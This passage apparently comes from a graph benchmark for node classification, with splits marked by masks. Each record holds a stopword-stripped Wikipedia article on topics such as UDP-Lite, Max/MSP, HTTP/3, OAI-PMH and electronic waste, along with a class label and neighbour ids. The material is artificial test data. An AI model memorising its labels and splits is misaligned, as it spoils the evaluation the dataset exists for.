    "text": "UDP-Lite:udp-lite udp-lite lightweight user datagram protocol sometimes udp lite connectionless protocol allows potentially damaged data payload delivered application rather discarded receiving station useful allows decisions integrity data made application layer application codec significance bits understood udp-lite described rfc 3828 udp-lite based user datagram protocol udp unlike udp either none packet protected checksum udp-lite allows partial checksums covers part datagram arbitrary count octets beginning packet therefore deliver packets partially corrupted designed multimedia protocols voice ip voip streamed video receiving packet damaged payload better receiving packet conventional udp transmission control protocol tcp single bit error cause bad checksum meaning whole packet must discarded way bit errors promoted entire packet errors even damage data trivial computing checksum udp-lite uses checksum algorithm used udp tcp modern multimedia codecs like g.718 adaptive multi-rate amr audio h.264 mpeg-4 video resilience features already built syntax structure stream allows codec detect errors stream b potentially correct least conceal error playback codecs ideal partners udp-lite since designed work damaged data stream better codecs receive perhaps 200 bytes bits damaged rather conceal loss entire packet discarded due bad checksum application layer understands significance data transport sees udp packets means error protection added necessary higher layer example forward error correction scheme application best place decide parts stream sensitive error protect accordingly rather single brute force checksum covers everything equally example seen research hammer et al udp-lite coupled amr codec give improved speech quality lossy network conditions since modern link layers protect carried data strong cyclic redundancy check crc discard damaged frames making effective use udp lite requires link layer aware network layer data carried since current ip stacks implement cross-layer interactions making effective use udp-lite currently requires specially modified device drivers ip protocol identifier 136 udp-lite uses set port numbers assigned internet assigned numbers authority iana use udp support udp-lite added linux kernel version 2.6.20 support udp-lite added freebsd kernel r264212 changeset also mfc'ed back stable/10 became available freebsd 10.1-release bsd socket api extended support udp-lite third parameter socket system call set ipproto_udplite request udp-lite socket one also easily set part packet covered checksum starting beginning including header packet smaller 12 octets sent setup checksum cover whole packet receiving side socket default drop packets covered completely udp emulation permit smaller coverage one use allow packets minimum 12 octets user data checksummed packet smaller coverage silently dropped bad packet coverage length least 20 octets including header checksum correct delivered application whole part payload still corrupted could covered checksum checksum correct incidentally latter unlikely checksum incorrect packet dropped actually impossible know error inside payload data udp-lite header packet could actually destined different program smallest possible coverage 8 octets headers need included checksum packets smaller length coverage always dropped independent settings ignoring sniffers interested traffic conforming standard udp-lite supported following operating systems",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      7855,
      562,
      2996,
      9909,
      823,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      8266,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      8946,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 7571,
    "label": 9,
    "text": "Max_(software):max software max also known max/msp/jitter visual programming language music multimedia developed maintained san francisco-based software company cycling '74 thirty-year history used composers performers software designers researchers artists create recordings performances installations max program modular routines existing shared libraries application programming interface api allows third-party development new routines named external objects thus max large user base programmers unaffiliated cycling '74 enhance software commercial non-commercial extensions program extensible design simultaneously represents program structure graphical user interface gui max described lingua franca developing interactive music performance software 1980s miller puckette began work max 1985 institut de recherche et coordination acoustique/musique ircam paris originally called patcher first version provided composers graphical interface creating interactive computer music scores macintosh point development max could n't perform real-time sound synthesis software instead sent control messages external hardware synthesizers samplers using midi similar protocol earliest widely recognized use composition pluton 1988 piano computer piece philippe manoury software synchronized computer piano controlled sogitec 4x audio processing 1989 ircam developed max/fts faster sound version max ported ircam signal processing workstation ispw next also known audio max would prove forerunner max msp audio extensions adding ability real-time synthesis using internal hardware digital signal processor dsp board year ircam licensed software opcode systems 1990s opcode launched commercial version named max 1990 developed extended david zicarelli however 1997 opcode considering cancelling instead zicarelli acquired publishing rights founded new company cycling '74 continue commercial development timing fortunate opcode acquired gibson guitar 1998 ended operations 1999 ircam in-house max development also winding last version produced jmax direct descendant max/fts developed 1998 silicon graphics sgi later linux systems used java graphical interface c real-time backend eventually released open-source software meanwhile puckette independently released fully redesigned open-source composition tool named pure data pd 1996 despite underlying engineering differences ircam versions continued tradition cycling '74 first max release 1997 derived partly puckette work pure data called max/msp max signal processing initials miller smith puckette remains notable max many extensions incarnations made max capable manipulating real-time digital audio signals without dedicated dsp hardware meant composers could create complex synthesizers effects processors using general-purpose computer like macintosh powerbook g3 1999 netochka nezvanova collective released nato.0+55 suite externals added extensive real-time video control max 2000s though nato became increasingly popular among multimedia artists development stopped 2001 softvns another set extensions visual processing max released 2002 canadian media artist david rokeby cycling '74 released set video extensions jitter alongside max 4 2003 adding real-time video opengl graphics matrix processing capabilities max 4 also first version run windows max 5 released 2008 redesigned patching gui first time max commercial history 2010s 2011 max 6 added new audio engine compatible 64-bit operating systems integration ableton live sequencer software extension called gen compile optimized max patches higher performance max 7 released 2014 focused 3d rendering improvements september 25 2018 max 8 recent major version software released new features include mc new way work multiple channels javascript support node max vizzie 2 june 6 2017 ableton announced purchase cycling '74 max continuing published cycling '74 david zicarelli remaining company programs sharing max visual programming concepts commonly used real-time audio video synthesis processing max named composer max mathews considered descendant music language though graphical nature disguises fact like music-n languages max distinguishes two levels time event scheduler dsp corresponds distinction k-rate a-rate processes csound control rate vs. audio rate supercollider basic language max sibling programs data-flow system max programs named patches made arranging connecting building-blocks objects within patcher visual canvas objects act self-contained programs reality dynamically linked libraries may receive input one visual inlets generate output visual outlets objects pass messages outlets inlets connected objects max supports six basic atomic data types transmitted messages object object int float list symbol bang signal msp audio connections several complex data structures exist within program handling numeric arrays table data hash tables coll data xml information pattr data json-based dictionaries dict data msp data structure buffer~ hold digital audio information within program memory addition jitter package adds scalable multi-dimensional data structure handling large sets numbers storing video datasets matrix data max typically learned acquiring vocabulary objects function within patcher example metro object functions simple metronome random object generates random integers objects non-graphical consisting object name several arguments-attributes essence class properties typed object box objects graphical including sliders number boxes dials table editors pull-down menus buttons objects running program interactively max/msp/jitter comes 600 objects standard package extensions program written third-party developers max patchers e.g encapsulating functionality patcher sub-program max patch objects written c c++ java javascript order execution messages traversing graph objects defined visual organization objects patcher result organizing principle max unusual program logic interface presented user typically related though newer versions max provide several technologies standard gui design max documents named patchers bundled stand-alone applications distributed free sold commercially addition max used author audio midi plugin software ableton live max live extension increased integration laptop computers live music performance electronic music elsewhere max/msp max/jitter received attention development environment available serious laptop music/video performance",
    "neighbors": [
      9345,
      2691,
      7172,
      3462,
      6797,
      8958,
      6933,
      6810,
      5037,
      5677,
      7983,
      823,
      9783,
      10051,
      9926,
      3665,
      7128,
      7769,
      9565,
      7550,
      5612,
      7535,
      8051,
      2045,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 7572,
    "label": 5,
    "text": "HTTP/3:http/3 http/3 h3 upcoming third major version hypertext transfer protocol used exchange binary information world wide web http/3 draft based previous rfc draft named hypertext transfer protocol http quic quic transport layer network protocol initially developed google user space congestion control used user datagram protocol udp 28 october 2018 mailing list discussion mark nottingham chair ietf http quic working groups made official request rename http-over-quic http/3 clearly identify another binding http semantics wire protocol ... people understand separation quic pass development quic working group http working group finalizing publishing draft subsequent discussions followed stretched several days nottingham proposal accepted fellow ietf members november 2018 gave official seal approval http-over-quic become http/3",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      11413,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      10016,
      1834,
      10057,
      11082,
      2893,
      6993,
      8557,
      6528,
      3971,
      3462,
      8584,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 7573,
    "label": 2,
    "text": "Larry_McVoy:larry mcvoy larry mcvoy born 1962 concord massachusetts united states ceo bitmover company makes bitkeeper version control system used february 2002 early 2005 manage source code linux kernel earned bs ms degrees computer science 1985 1987 respectively university wisconsin–madison work generally included performance enhancements various unix operating systems developed employers mcvoy worked sun worked peer-to-peer scm system named teamware would form basis later bitkeeper product mcvoy started working linux kernel around 0.9.7 version developed lmbench kernel benchmark lmbench maintained 2009 carl staelin bitkeeper source control system also developed integrated linux development process 2002 mcvoy decided charge use bitkeeper linux development community prompted development git tool began serving source control system linux kernel 2005 working sun early 1990s mcvoy number high-profile unix community members urged company open-source flagship unix product sunos compete microsoft new windows nt operating system proposal would created copyleft version sunos time linux reached 1.0 version",
    "neighbors": [
      9665,
      3618,
      10051,
      10436,
      7983,
      8976,
      5492
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7574,
    "label": 4,
    "text": "Fred_Teeven:fred teeven fredrik fred teeven born 5 august 1958 retired dutch politician people party freedom democracy vvd jurist teeven served member house representatives parliamentary leader livable netherlands party house representatives 23 may 2002 30 january 2003 2003 rejoined people party freedom democracy general election 2006 served member house representatives 30 november 2006 14 october 2010 became state secretary security justice cabinet rutte ii general election 2012 served member house representatives 20 september 2012 5 november 2012 26 march 2015 23 march 2017 teeven born province north holland studied law vu university amsterdam public management university twente working first tax collector became prosecutor becoming known crimefighter since led many investigations organised crime teeven involved prosecutions dési bouterse mink kok johan verhoek willem holleeder 2002 teeven succeeded pim fortuyn front runner lijsttrekker livable netherlands leefbaar nederland 23 may 2002 30 january 2003 parliamentary group leader livable netherlands house representatives also member house representatives 23 may 2002 – 30 january 2003 found would front runner 2003 elections quit party returned former post public prosecutor 2006 teeven announced return politics time people party freedom democracy vvd dutch general election 2006 6th candidate list vvd elected house representatives 30 november 2006 main spokesperson justice policy dutch general election 2010 3rd candidate list vvd cabinet formation 2010 first rutte cabinet teeven became undersecretary security justice taking office 14 october 2010 resigned day mp 5 november 2012 continued undersecretary security justice second rutte cabinet meanwhile mp 20 september 2012 5 november 2012 undersecretary security justice tasked dealing prevention family law youth justice copyright law 10 march 2015 justice minister ivo opstelten resigned together teeven former informed house representatives wrongly early 2000s deal made teeven state prosecutor 1994 deal concerned money paid drug trafficker whose money seized received compensation origin money could proved illegal opstelten mentioned house representatives lower amount one actually paid receipt transaction gone missing later surfaced wake scandal house chairman van miltenburg resigned 12 december 2015 became clear suppressed two letters whistle blower justice department already mentioned right details 'deal putting letters shredder resigning state secretary teeven served member house representatives 26 march 2015 23 march 2017 teeven currently works bus driver public transportation company connexxion consultant public relations cybercrime",
    "neighbors": [
      4945
    ],
    "mask": "None"
  },
  {
    "node_id": 7575,
    "label": 5,
    "text": "Open_Archives_Initiative_Protocol_for_Metadata_Harvesting:open archives initiative protocol metadata harvesting open archives initiative protocol metadata harvesting oai-pmh protocol developed harvesting metadata descriptions records archive services built using metadata many archives implementation oai-pmh must support representing metadata dublin core may also support additional representations protocol usually referred oai protocol oai-pmh uses xml http version 2.0 protocol released 2002 document last updated 2015 creative commons license by-sa late 1990s herbert van de sompel ghent university working researchers librarians los alamos national laboratory us called meeting address difficulties related interoperability issues e-print servers digital repositories meeting held santa fe new mexico october 1999 key development meeting definition interface permitted e-print servers expose metadata papers held structured fashion repositories could identify copy papers interest interface/protocol named santa fe convention several workshops held 2000 acm digital libraries conference elsewhere share ideas santa fe convention discovered workshops problems faced e-print community also shared libraries museums journal publishers others needed share distributed resources address needs coalition networked information digital library federation provided funding establish open archives initiative oai secretariat managed herbert van de sompel carl lagoze oai held meeting cornell university ithaca new york september 2000 improve interface developed santa fe convention specifications refined e-mail oai-pmh version 1.0 introduced public january 2001 workshop washington d.c. another february berlin germany subsequent modifications xml standard w3c required making minor modifications oai-pmh resulting version 1.1 current version 2.0 released june 2002 contained several technical changes enhancements backward compatible oai protocol adopted many digital libraries institutional repositories digital archives although registration mandatory encouraged several large registries oai-compliant repositories commercial search engines use oai-pmh acquire resources google initially included support oai-pmh launching sitemaps however decided support standard xml sitemaps format may 2008 2004 yahoo acquired content oaister university michigan obtained metadata harvesting oai-pmh wikimedia uses oai-pmh repository provide feeds wikipedia related site updates search engines bulk analysis/republishing endeavors especially dealing thousands files harvested every day oai-pmh help reducing network traffic resource usage incremental harvesting nasa mercury metadata search system uses oai-pmh index thousands metadata records global change master directory gcmd every day mod_oai project using oai-pmh expose content web crawlers accessible apache web servers oai-pmh based client–server architecture harvesters request information updated records repositories requests data based datestamp range restricted named sets defined provider data providers required provide xml metadata dublin core format may also provide xml formats number software systems support oai-pmh including fedora ethos british library gnu eprints university southampton open journal systems public knowledge project desire2learn dspace mit hyperjournal university pisa digibib digibis mycore primo digitool rosetta metalib ex libris archivalware ptfs door elab lugano switzerland panfmp pangaea data library simpledl roaring development joai number large archives support protocol including arxiv cern document server dedicated workshop cern workshop innovations scholarly communication held cern geneva regular basis since 2001 co-organised university geneva cern every two years june oai8 held june 19th-21st 2013 oai9 held june 17–19 2015 oai10 held june 21 23 2017",
    "neighbors": [
      865,
      10759,
      140,
      3052,
      8735,
      8405,
      6331,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 7576,
    "label": 9,
    "text": "PowerHouse_(programming_language):powerhouse programming language powerhouse trademarked name byte-compiled fourth-generation programming language 4gl originally produced quasar corporation later renamed cognos incorporated hewlett-packard hp3000 mini-computer initially composed five components powerhouse introduced 1982 bundled together single product quiz quick/qdesign previously available separately new batch processor qtp 1983 quasar changed name cognos corporation began porting application development tools platforms notably digital equipment corporation vax data general eclipse mv ibm as/400 along unix platforms vendors cognos also began extending product line add-ons powerhouse example architect end-user applications written powerhouse example multiview subsequent development product added support platform-specific relational databases hp allbase/sql dec rdb microsoft sql server well cross-platform relational databases oracle sybase ibm db2 powerhouse language represented considerable achievement compared languages like cobol pascal pl/1 powerhouse substantially cut amount labour required produce useful applications chosen platforms achieved use central data-dictionary compiled file extended attributes data fields natively available dbms frequently used programming idioms order support data dictionary powerhouse tightly coupled underlying database management system and/or file system target platforms case hp3000 image shallow-network dbms ksam indexed file system entire powerhouse language reflected origins described data dictionary need describe attributes applications unless need change fly example change size item make fit within constraints defined item simple quick screens could generated four lines source code screenname name screen programmer assigned program filename file name accessed data dictionary whether items file would fit screen would determined many items size n't fit program would modified eliminate unneeded items change size items size etc file couple items quick easy generate screen data entry deletion simply look data index simple quiz reports almost easy one-file report simple items file would sent screen maybe desired fashion simple since qtp programs usually involved adding deleting modifying data much need simple code programs care exercised potential danger whole file files data could wiped rather easily quick quiz qtp programs could run compiled converted machine language uncompiled source code compiled programs generally ran faster good method modifications source code corrupt object code quick screens used primarily data entry could call quick screens quiz reports qtp applications update data also things done source code order generate compiled code example go command run source code equivalent build command generate compiled code commands could abbreviated first three characters writing source code access could abbreviated acc well define report screen etc quiz reports could routed printer screen ascii text files set report device printer screen disk command given right access commands novice could write simple report programs dangerous though novice could easily destroy data security whether one call interpreters access quiz also access qtp quick like virtual machine languages powerhouse cpu intensive sometimes produced visibly negative impact overall transaction performance necessitating hardware upgrades cognos practice tying license fees hardware performance metrics resulted high licensing costs powerhouse users cognos initially attempted move intel platform 1988 dos-based powerhouse pc product used numerous partners build bespoke applications small medium-sized customers entirely unsuccessful time however cognos eventually produced axiant c.1995 ported powerhouse-like syntax intel-based microsoft windows visual development environment linked sql aware dbms running machines radical changes wrought pc revolution began time powerhouse introduced eventually brought cost host computers extent high-priced software development tools powerhouse became unattractive customers around 1999 powerhouse web released order support development web-aware applications products like business intelligence financial performance management run commodity architectures high-end unix servers form core cognos product line cognos acquired ibm january 30 2008 powerhouse application development tools including powerhouse server axiant 4gl powerhouse web acquired ibm unicom systems division unicom global december 31 2013 unicom continues support worldwide customer base products",
    "neighbors": [
      10340,
      5384,
      4042,
      6797,
      10413,
      11604,
      11030,
      119,
      3323,
      1469
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7577,
    "label": 0,
    "text": "Sentence_embedding:sentence embedding sentence embedding collective name set techniques natural language processing nlp sentences mapped vectors real numbers sentence embedding used machine learning software libraries pytorch tensorflow way testing sentence encodings apply sentences involving compositional knowledge sick corpus entailment sick-e relatedness sick-r best results obtained using bilstm network trained stanford natural language inference snli corpus pearson correlation coefficient sick-r 0.885 result sick-e 86.3 slight improvement previous scores presented sick-r 0.888 sick-e 87.8 using concatenation bidirectional gated recurrent unit infersent sentence embeddings training code learning general purpose distributed sentence representations via large scale multi-task learning",
    "neighbors": [
      6274,
      11330,
      7780,
      9935,
      4468
    ],
    "mask": "Test"
  },
  {
    "node_id": 7578,
    "label": 4,
    "text": "Content_Threat_Removal:content threat removal content threat removal ctr cyber security technology intended defeat threat posed handling digital content cyberspace unlike defences including antivirus software sandboxed execution rely able detect threats similarly content disarm reconstruction ctr designed remove threat without knowing whether done acts without knowing data contains threat detection strategies work detecting unsafe content blocking removing content content deemed safe delivered destination contrast content threat removal assumes data hostile delivers none destination regardless whether actually hostile although data delivered business information carried data delivered using new data created purpose advanced attacks continuously defeat defences based detection often referred zero day attacks soon discovered attack detection mechanisms must updated identify neutralise attack systems unprotected attacks succeed attackers skilled finding new ways evading detection polymorphic code used evade detection known unsafe data sandbox detection allows attacks evade dynamic analysis content threat removal defence works intercepting data way destination business information carried data extracted data discarded entirely new clean safe data built carry information destination effect building new data carry business information unsafe elements original data left behind discarded includes executable data macros scripts malformed data triggers vulnerabilities applications ctr form content transformation transformations provide complete defence content threat ctr applicable user-to-user traffic email chat machine-to-machine traffic web services data transfers intercepted in-line application layer proxies transform way information content delivered remove threat ctr works extracting business information data possible extract information executable code means ctr directly applicable web browsing since web pages code however applied content downloaded uploaded web sites although web pages transformed render safe web browsing isolated remote access protocols used reach isolated environment subjected ctr ctr provides solution problem stegware naturally removes detectable steganography eliminates symbiotic permutation steganography normalisation deep secure pioneered development ctr number products services incorporate ctr including application layer proxies email web services icap internet content adaptation protocol sidecar servers uploaded downloaded content garrison provide remote desktop isolation solution display content converted video signal recoded video stream using separate hardware chips process removes threat content display content",
    "neighbors": [
      10816,
      10210,
      3944,
      7851,
      4972,
      4725,
      1017,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7579,
    "label": 4,
    "text": "Electronic_waste:electronic waste electronic waste e-waste describes discarded electrical electronic devices used electronics destined refurbishment reuse resale salvage recycling material recovery disposal also considered e-waste informal processing e-waste developing countries lead adverse human health effects environmental pollution electronic scrap components cpus contain potentially harmful materials lead cadmium beryllium brominated flame retardants recycling disposal e-waste may involve significant risk health workers communities developed countries great care must taken avoid unsafe exposure recycling operations leaking materials heavy metals landfills incinerator ashes electronic-waste electronic waste created electronic product discarded end useful life rapid expansion technology consumption driven society results creation large amount e-waste every minute european weee directive classifies waste ten categories large household appliances including cooling freezing appliances small household appliances equipment including monitors consumer electronics including tvs lamps luminaires toys tools medical devices monitoring control instruments automatic dispensers include used electronics destined reuse resale salvage recycling disposal well re-usables working repairable electronics secondary raw materials copper steel plastic etc. term waste reserved residue material dumped buyer rather recycled including residue reuse recycling operations loads surplus electronics frequently commingled good recyclable non-recyclable several public policy advocates apply term e-waste e-scrap broadly surplus electronics cathode ray tubes crts considered one hardest types recycle crts relatively high concentration lead phosphors confused phosphorus necessary display united states environmental protection agency epa includes discarded crt monitors category hazardous household waste considers crts set aside testing commodities discarded speculatively accumulated left unprotected weather damage crt devices often confused dlp rear projection tv different recycling process due materials composed eu member states operate system via european waste catalogue ewc european council directive interpreted member state law uk form list wastes directive however list ewc gives broad definition ewc code 16 02 13* hazardous electronic waste requiring waste operators employ hazardous waste regulations annex 1a annex 1b refined definition constituent materials waste also require assessment via combination annex ii annex iii allowing operators determine whether waste hazardous debate continues distinction commodity waste electronics definitions exporters accused deliberately leaving difficult-to-recycle obsolete non-repairable equipment mixed loads working equipment though may also come ignorance avoid costly treatment processes protectionists may broaden definition waste electronics order protect domestic markets working secondary equipment high value computer recycling subset electronic waste working reusable laptops desktops components like ram help pay cost transportation larger number worthless pieces achieved display devices less negative scrap value 2011 report ghana e-waste country assessment found 215,000 tons electronics imported ghana 30 brand new 70 used used product study concluded 15 reused scrapped discarded contrasts published uncredited claims 80 imports ghana burned primitive conditions rapid changes technology changes media tapes software mp3 falling prices planned obsolescence resulted fast-growing surplus electronic waste around globe technical solutions available cases legal framework collection logistics services need implemented technical solution applied display units crt lcd led monitors processors cpu gpu apu chips memory dram sram audio components different useful lives processors frequently out-dated software longer optimized likely become e-waste display units often replaced working without repair attempts due changes wealthy nation appetites new display technology problem could potentially solved modular smartphones phonebloks types phones durable technology change certain parts phone making environmentally friendly able simply replace part phone broken reduce e-waste estimated 50 million tons e-waste produced year usa discards 30 million computers year 100 million phones disposed europe year environmental protection agency estimates 15–20 e-waste recycled rest electronics go directly landfills incinerators 2006 united nations estimated amount worldwide electronic waste discarded year 50 million metric tons according report unep titled recycling – e-waste resources amount e-waste produced – including mobile phones computers – could rise much 500 percent next decade countries india united states world leader producing electronic waste tossing away 3 million tons year china already produces 2.3 million tons 2010 estimate domestically second united states despite banned e-waste imports china remains major e-waste dumping ground developed countries society today revolves around technology constant need newest high-tech products contributing mass amount e-waste since invention iphone cell phones become top source e-waste products made last two years electrical waste contains hazardous also valuable scarce materials 60 elements found complex electronics 2013 apple sold 796 million idevices ipod iphone ipad cell phone companies make cell phones made last consumer purchase new phones companies give products short lifespans know consumer want new product buy make united states estimated 70 heavy metals landfills comes discarded electronics agreement number discarded electronic devices increasing considerable disagreement relative risk compared automobile scrap example strong disagreement whether curtailing trade used electronics improve conditions make worse according article motherboard attempts restrict trade driven reputable companies supply chain unintended consequences one theory increased regulation electronic wastes concern environmental harm nature economies creates economic disincentive remove residues prior export critics trade used electronics maintain still easy brokers calling recyclers export unscreened electronic waste developing countries china india parts africa thus avoiding expense removing items like bad cathode ray tubes processing expensive difficult developing countries become toxic dump yards e-waste developing countries receiving foreign e-waste often go repair recycle forsaken equipment yet still 90 e-waste ended landfills developing countries 2003 proponents international trade point success fair trade programs industries cooperation led creation sustainable jobs bring affordable technology countries repair reuse rates higher defenders trade used electronics say extraction metals virgin mining shifted developing countries recycling copper silver gold materials discarded electronic devices considered better environment mining also state repair reuse computers televisions become lost art wealthier nations refurbishing traditionally path development south korea taiwan southern china excelled finding retained value used goods cases set billion-dollar industries refurbishing used ink cartridges single-use cameras working crts refurbishing traditionally threat established manufacturing simple protectionism explains criticism trade works like waste makers vance packard explain criticism exports working product example ban import tested working pentium 4 laptops china bans export used surplus working electronics japan opponents surplus electronics exports argue lower environmental labour standards cheap labour relatively high value recovered raw materials lead transfer pollution-generating activities smelting copper wire china malaysia india kenya various african countries electronic waste sent countries processing sometimes illegally many surplus laptops routed developing nations dumping grounds e-waste united states ratified basel convention ban amendment domestic federal laws forbidding export toxic waste basel action network estimates 80 electronic waste directed recycling u.s. get recycled put container ships sent countries china figure disputed exaggeration epa institute scrap recycling industries world reuse repair recycling association independent research arizona state university showed 87–88 imported used computers higher value best value constituent materials contained official trade end-of-life computers thus driven reuse opposed recycling proponents trade say growth internet access stronger correlation trade poverty haiti poor closer port new york southeast asia far electronic waste exported new york asia haiti thousands men women children employed reuse refurbishing repair re-manufacturing unsustainable industries decline developed countries denying developing nations access used electronics may deny sustainable employment affordable products internet access force deal even less scrupulous suppliers series seven articles atlantic shanghai-based reporter adam minter describes many computer repair scrap separation activities objectively sustainable opponents trade argue developing countries utilize methods harmful wasteful expedient prevalent method simply toss equipment onto open fire order melt plastics burn away non-valuable metals releases carcinogens neurotoxins air contributing acrid lingering smog noxious fumes include dioxins furans bonfire refuse disposed quickly drainage ditches waterways feeding ocean local water supplies june 2008 container electronic waste destined port oakland u.s. sanshui district mainland china intercepted hong kong greenpeace concern exports electronic waste raised press reports india ghana côte d'ivoire nigeria research undertaken countering weee illegal trade cwit project funded european commission found europe 35 3.3 million tons e-waste discarded 2012 ended officially reported amounts collection recycling systems 65 6.15 million tons either guiyu shantou region china massive electronic waste processing community often referred e-waste capital world traditionally guiyu agricultural community however mid-1990s transformed e-waste recycling center involving 75 local households additional 100,000 migrant workers thousands individual workshops employ laborers snip cables pry chips circuit boards grind plastic computer cases particles dip circuit boards acid baths dissolve precious metals others work strip insulation wiring attempt salvage tiny amounts copper wire uncontrolled burning disassembly disposal led number environmental problems groundwater contamination atmospheric pollution water pollution either immediate discharge surface runoff especially near coastal areas well health problems including occupational safety health effects among directly indirectly involved due methods processing waste six many villages guiyu specialize circuit-board disassembly seven plastics metals reprocessing two wire cable disassembly greenpeace environmental group sampled dust soil river sediment groundwater guiyu found high levels toxic heavy metals organic contaminants places lai yun campaigner group found 10 poisonous metals lead mercury cadmium guiyu one example digital dumps similar places found across world nigeria ghana india guiyu likely one oldest largest informal e-waste recycling sites world however many sites worldwide including india ghana agbogbloshie nigeria philippines research involving informal e-waste recycling done guiyu handful studies describe exposure levels e-waste workers community environment example locals migrant workers delhi northern union territory india scavenge discarded computer equipment extract base metals using toxic unsafe methods bangalore located southern india often referred silicon valley india growing informal e-waste recycling sector studies found e-waste workers slum community higher levels v cr mn mo sn tl pb workers e-waste recycling facility processes dismantling disposing electronic waste developing countries led number environmental impacts illustrated graphic liquid atmospheric releases end bodies water groundwater soil air therefore land sea animals – domesticated wild crops eaten animals human drinking water one study environmental effects guiyu china found following separate study agbogbloshie e-waste dump ghana found presence lead levels high 18,125 ppm soil us epa standard lead soil play areas 400 ppm 1200 ppm non-play areas scrap workers agbogbloshie e-waste dump regularly burn electronic components auto harness wires copper recovery releasing toxic chemicals like lead dioxins furans environment environmental impact processing different electronic waste components e-waste presents potential security threat individuals exporting countries hard drives properly erased computer disposed reopened exposing sensitive information credit card numbers private financial data account information records online transactions accessed willing individuals organized criminals ghana commonly search drives information use local scams electronic files government contracts discovered hard drives found agbogbloshie multimillion-dollar agreements united states security institutions defense intelligence agency dia transportation security administration homeland security resurfaced agbogbloshie recycling essential element e-waste management properly carried greatly reduce leakage toxic materials environment mitigate exhaustion natural resources however need encouraged local authorities community education one major challenges recycling printed circuit boards electronic wastes circuit boards contain precious metals gold silver platinum etc base metals copper iron aluminum etc one way e-waste processed melting circuit boards burning cable sheathing recover copper wire open- pit acid leaching separating metals value conventional method employed mechanical shredding separation recycling efficiency low alternative methods cryogenic decomposition studied printed circuit board recycling methods still investigation properly disposing reusing electronics help prevent health problems reduce greenhouse-gas emissions create jobs reuse refurbishing offer environmentally friendly socially conscious alternative downcycling processes u.s. environmental protection agency encourages electronic recyclers become certified demonstrating accredited independent third party auditor meet specific standards safely recycle manage electronics work ensure highest environmental standards maintained two certifications electronic recyclers currently exist endorsed epa customers encouraged choose certified electronics recyclers responsible electronics recycling reduces environmental human health impacts increases use reusable refurbished equipment reduces energy use conserving limited resources two epa-endorsed certification programs responsible recyclers practices r2 e-stewards certified companies ensure meeting strict environmental standards maximize reuse recycling minimize exposure human health environment ensure safe management materials require destruction data used electronics certified electronics recyclers demonstrated audits means continually meet specific high environmental standards safely manage used electronics certified recycler held particular standard continual oversight independent accredited certifying body certification board accredits oversees certifying bodies ensure meet specific responsibilities competent audit provide certification u.s. retailers offer opportunities consumer recycling discarded electronic devices us consumer electronics association cea urges consumers dispose properly end-of-life electronics recycling locator www.greenergadgets.org list includes manufacturer retailer programs use strictest standards third-party certified recycling locations provide consumers assurance products recycled safely responsibly cea research found 58 percent consumers know take end-of-life electronics electronics industry would much like see level awareness increase consumer electronics manufacturers retailers sponsor operate 5,000 recycling locations nationwide vowed recycle one billion pounds annually 2016 sharp increase 300 million pounds industry recycled 2010 sustainable materials management smm electronic challenge created united states environmental protection agency epa 2012 participants challenge manufacturers electronics electronic retailers companies collect end-of-life eol electronics various locations send certified third-party recycler program participants able publicly promote report 100 responsible recycling companies electronics takeback coalition etbc campaign aimed protecting human health limiting environmental effects electronics produced used discarded etbc aims place responsibility disposal technology products electronic manufacturers brand owners primarily community promotions legal enforcement initiatives provides recommendations consumer recycling list recyclers judged environmentally responsible major benefits rise recycling waste collection created producers consumers valuable materials recovered kept away landfill incineration still many problems present epr system including “ ensure proper enforcement recycling standards waste positive net value role competition ” kunz et al. many stakeholders agreed needs higher standard accountability efficiency improve systems recycling everywhere well growing amount waste opportunity downfall since gives us chances create efficient system make recycling competition cost-effective producers agreed needs higher drive competition allows wider range producer responsibility organizations choose e-waste recycling certified electronics recycler program electronic recyclers comprehensive integrated management system standard incorporates key operational continual improvement elements quality environmental health safety performance grassroots silicon valley toxics coalition promotes human health addresses environmental justice problems resulting toxins technologies world reuse repair recycling association wr3a.org organization dedicated improving quality exported electronics encouraging better recycling standards importing countries improving practices fair trade principles take back tv project electronics takeback coalition grades television manufacturers find responsible coalition view also efforts raise awareness potentially hazardous conditions dismantling e-waste american prisons silicon valley toxics coalition prisoner-rights activists environmental groups released toxic sweatshops report details prison labor used handle e-waste resulting health consequences among workers groups allege since prisons adequate safety standards inmates dismantling products unhealthy unsafe conditions many developed countries electronic waste processing usually first involves dismantling equipment various parts metal frames power supplies circuit boards plastics often hand increasingly automated shredding equipment typical example nadin electronic waste processing plant novi iskar bulgaria—the largest facility kind eastern europe advantages process human ability recognize save working repairable parts including chips transistors ram etc disadvantage labor cheapest countries lowest health safety standards alternative bulk system hopper conveys material shredding unsophisticated mechanical separator screening granulating machines separate constituent metal plastic fractions sold smelters plastics recyclers recycling machinery enclosed employs dust collection system emissions caught scrubbers screens magnets eddy currents trommel screens employed separate glass plastic ferrous nonferrous metals separated smelter leaded glass crts reused car batteries ammunition lead wheel weights sold foundries fluxing agent processing raw lead ore. copper gold palladium silver tin valuable metals sold smelters recycling hazardous smoke gases captured contained treated mitigate environmental threat methods allow safe reclamation valuable computer construction materials hewlett-packard product recycling solutions manager renee st. denis describes process move giant shredders 30 feet tall shreds everything pieces size quarter disk drive shredded pieces big hard get data ideal electronic waste 